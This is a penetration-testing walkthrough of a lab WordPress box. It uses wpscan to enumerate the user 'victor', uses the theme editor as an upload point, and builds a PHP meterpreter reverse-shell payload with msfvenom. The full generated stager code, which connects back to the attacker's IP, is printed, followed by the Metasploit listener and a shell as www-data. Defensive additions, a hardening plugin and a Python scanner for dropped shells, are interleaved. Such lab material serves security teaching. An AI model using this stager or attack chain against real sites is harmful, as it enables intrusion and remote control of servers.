Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive
To see full list of options use --hh.
wpscan March 2019
# use wpscan's enumeration mode to find the users
┌──(root㉿kali)-[~]
└─# wpscan --url //192.168.216.151/wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: //192.168.216.151/wordpress/ [192.168.216.151]
[+] Started: Sat Nov 5 17:15:10 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: //192.168.216.151/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - //codex.wordpress.org/XML-RPC_Pingback_API
| - //www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - //www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - //www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - //www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: //192.168.216.151/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: //192.168.216.151/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: //192.168.216.151/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - //www.iplocation.net/defend-wordpress-from-ddos
| - //github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - //192.168.216.151/wordpress/?feed=rss2, <generator>//wordpress.org/?v=5.2.2</generator>
| - //192.168.216.151/wordpress/?feed=comments-rss2, <generator>//wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: //wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: //wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - //192.168.216.151/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=======================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at //wpscan.com/register
[+] Finished: Sat Nov 5 17:15:13 2022
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.069 KB
[+] Data Received: 19.678 MB
[+] Memory used: 194.695 MB
[+] Elapsed time: 00:00:02
This finds one user, victor; log in with it
Once logged in, we can find an upload point and upload a shell (webshell)
File upload
Upload a one-line webshell
- find the upload point
- upload a shell
- it may be killed by antivirus
This approach cannot keep a persistent connection to the target:
- internal network
- dynamic IP (the IP changes)
We can use a reverse connection instead: have the target actively connect back to our attacking machine
Find the upload point
In the theme editor we found that some files can be modified (most cannot); find a location that suits uploading our shell
Using msf
- generate a payload: PHP reverse connection
- built-in vulnerability database: exploitation, privilege escalation
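Each finding wpscan and cmseek reported above (XML-RPC enabled, the version leaking through the RSS generator, username enumeration via author IDs and login error messages, and the theme editor as a file-write point) has a configuration-level fix. The must-use plugin below is an added example written for this page, not code from the Prime box, the write-up or WPScan; the hook and constant names are WordPress core APIs, the message text and comments are mine.

```php
<?php
/**
 * Plugin Name: Hardening for the findings in this write-up
 * Added example, not part of the original write-up. Place it in
 * wp-content/mu-plugins/ so it loads on every request; each hook maps to one
 * finding from the wpscan/cmseek output.
 */

// 1. "XML-RPC seems to be enabled": disable it. xmlrpc.php is the transport
//    for the multicall password attacks wpscan lists (--password-attack xmlrpc).
add_filter('xmlrpc_enabled', '__return_false');

// 2. "Author Id Brute Forcing - Author Pattern": ?author=1 normally redirects
//    to /author/<login>/, leaking the login name (here: victor). Refuse the
//    query variable for anonymous visitors.
add_action('template_redirect', function () {
    if (!is_admin() && !is_user_logged_in() && isset($_GET['author'])) {
        wp_die('Not found', 'Not found', ['response' => 404]);
    }
});

// 3. The same login names are exposed by the REST API. Drop only the users
//    routes for anonymous requests instead of disabling REST entirely.
add_filter('rest_endpoints', function (array $endpoints) {
    if (is_user_logged_in()) {
        return $endpoints;
    }
    unset($endpoints['/wp/v2/users'], $endpoints['/wp/v2/users/(?P<id>[\d]+)']);
    return $endpoints;
});

// 4. "Login Error Messages (Aggressive Detection)": WordPress reports whether
//    the username or the password was wrong, which confirms valid logins.
//    Return one generic message for both cases.
add_filter('login_errors', function () {
    return 'Invalid login credentials.';
});

// 5. "WordPress version 5.2.2 identified ... Rss Generator": stop emitting
//    the version in feeds and in the HTML head.
add_filter('the_generator', '__return_empty_string');

// 6. The theme editor used above as the upload point is removed from the
//    dashboard (and the edit_themes capability is denied) by this constant.
//    wp-config.php is the conventional place for it; defining it here works
//    because the check happens at runtime, not at bootstrap.
if (!defined('DISALLOW_FILE_EDIT')) {
    define('DISALLOW_FILE_EDIT', true);
}

// Not fixable from PHP: "Upload directory has listing enabled" is an Apache
// setting; add "Options -Indexes" to the vhost or wp-content/uploads/.htaccess.
```

None of this patches the 5.2.2 core version itself; updating WordPress remains the fix for the CVEs cmseek listed.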
┌──(root㉿kali)-[~]
└─# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
Generate the payload with msfvenom
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.216.128 lport=7777 -o shell.php
Inspect this shell.php
┌──(root㉿kali)-[~/payload]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.216.128'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Upload the code from the third character onward (i.e. without the leading `/*`)
Start a listener with msfconsole
Then request this file: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/secret.php
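Before moving on to the listener, here is what the same step looks like from the target's side. As an added example (not part of the original walkthrough, and not WordPress's own code), the Python audit below does two things an administrator can run against the document root: it checks whether wp-config.php defines DISALLOW_FILE_EDIT, the WordPress setting that removes the theme and plugin editor this chain relies on, and it walks wp-content/themes for PHP files that both open a socket and evaluate received data (the function names are the ones visible in the generated shell.php above) or that are markedly newer than their theme's style.css. The directory layout it builds is a constructed fixture; the stand-in secret.php contains only the marker names, not a working stager.

```python
"""Audit a WordPress tree for theme-editor abuse and dropped PHP.

Added example for this walkthrough, not code from the original page or
from WordPress. build_fixture() creates a constructed sample tree so the
checks can be run offline.
"""
import os
import re
import tempfile
import time

# define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the editor.
EDIT_DISABLED_RE = re.compile(
    r"""define\s*\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.I)

# Names taken from the msfvenom PHP stager shown above: it tries these to
# open a socket, then eval()s what it reads back.
SOCKET_FUNCS = ('stream_socket_client', 'fsockopen', 'socket_create')
EXEC_FUNCS = ('eval(', 'create_function')
# A PHP file more than a day newer than its theme's style.css was not
# shipped with the theme (assumed tolerance).
MTIME_SLACK = 86400


def file_edit_disabled(wp_root):
    """True if wp-config.php turns the theme/plugin editor off."""
    cfg = os.path.join(wp_root, 'wp-config.php')
    if not os.path.isfile(cfg):
        return False
    with open(cfg, encoding='utf-8', errors='replace') as fh:
        return bool(EDIT_DISABLED_RE.search(fh.read()))


def scan_themes(wp_root):
    """Map relative path -> reasons for suspicious PHP under wp-content/themes."""
    findings = {}
    themes = os.path.join(wp_root, 'wp-content', 'themes')
    for theme in sorted(os.listdir(themes)):
        tdir = os.path.join(themes, theme)
        if not os.path.isdir(tdir):
            continue
        style = os.path.join(tdir, 'style.css')
        ref_mtime = os.path.getmtime(style) if os.path.isfile(style) else None
        for dirpath, _, files in os.walk(tdir):
            for name in sorted(files):
                if not name.endswith('.php'):
                    continue
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    src = fh.read()
                reasons = []
                sock = [f for f in SOCKET_FUNCS if f in src]
                exe = [f for f in EXEC_FUNCS if f in src]
                if sock and exe:   # opens a connection AND executes what it reads
                    reasons.append('socket+exec:' + ','.join(sock + exe))
                if ref_mtime is not None and os.path.getmtime(path) > ref_mtime + MTIME_SLACK:
                    reasons.append('newer_than_theme')
                if reasons:
                    rel = os.path.relpath(path, wp_root).replace(os.sep, '/')
                    findings[rel] = reasons
    return findings


def build_fixture(disable_editor=False):
    """Constructed sample: a minimal WordPress tree in a temp directory."""
    root = tempfile.mkdtemp(prefix='wp_audit_')
    theme = os.path.join(root, 'wp-content', 'themes', 'twentynineteen')
    os.makedirs(theme)
    cfg = "<?php\ndefine('DB_NAME', 'wordpress');\n"
    if disable_editor:
        cfg += "define('DISALLOW_FILE_EDIT', true);\n"
    with open(os.path.join(root, 'wp-config.php'), 'w') as fh:
        fh.write(cfg)
    shipped = time.time() - 3 * 365 * 86400   # theme files dated years back
    for name, body in (('style.css', '/* Theme Name: Twenty Nineteen */'),
                       ('functions.php', '<?php function twentynineteen_setup() {}')):
        p = os.path.join(theme, name)
        with open(p, 'w') as fh:
            fh.write(body)
        os.utime(p, (shipped, shipped))
    # Stand-in for the dropped file: marker names only, not a working stager.
    with open(os.path.join(theme, 'secret.php'), 'w') as fh:
        fh.write("<?php /* constructed fixture */ $f = 'stream_socket_client'; eval($b);")
    return root


if __name__ == '__main__':
    root = build_fixture()
    print('editor disabled:', file_edit_disabled(root))
    for rel, why in scan_themes(root).items():
        print(rel, why)
```

On the fixture the only hit is secret.php, for both reasons; functions.php is neither newer than style.css nor does it combine a socket call with eval. Pointing `scan_themes()` at a real `/var/www/html/wordpress` and comparing the result with the listing the meterpreter `ls` produces later in this write-up shows the same file standing out by its 2022 timestamp among 2018/2019 theme files.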
┌──(root㉿kali)-[~/payload]
└─# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.216.128
lhost => 192.168.216.128
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.216.128:7777 ## listener running; as soon as the file containing our payload is requested (//192.168.216.151/wordpress/wp-content/themes/twentynineteen/secret.php) we get a shell on our side
[*] Sending stage (39282 bytes) to 192.168.216.151
[*] Meterpreter session 1 opened (192.168.216.128:7777 -> 192.168.216.151:57438 ) at 2022-11-05 18:27:39 +0800
meterpreter > ls
Listing: /var/www/html/wordpress/wp-content/themes/twentynineteen
=================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 840 fil 2018-12-14 18:33:42 +0800 404.php
100644/rw-r--r-- 1229 fil 2018-12-19 19:18:26 +0800 archive.php
040755/rwxr-xr-x 4096 dir 2019-06-19 08:50:52 +0800 classes
100644/rw-r--r-- 3988 fil 2018-12-14 19:25:40 +0800 comments.php
040755/rwxr-xr-x 4096 dir 2019-06-19 08:50:52 +0800 fonts
100644/rw-r--r-- 1608 fil 2018-12-14 18:33:42 +0800 footer.php
100644/rw-r--r-- 10035 fil 2019-01-03 10:04:50 +0800 functions.php
100644/rw-r--r-- 1870 fil 2019-04-16 16:30:54 +0800 header.php
100644/rw-r--r-- 2874 fil 2019-04-16 16:30:54 +0800 image.php
040755/rwxr-xr-x 4096 dir 2019-06-19 08:50:52 +0800 inc
100644/rw-r--r-- 1060 fil 2018-12-19 19:18:26 +0800 index.php
...
meterpreter > getuid
Server username: www-data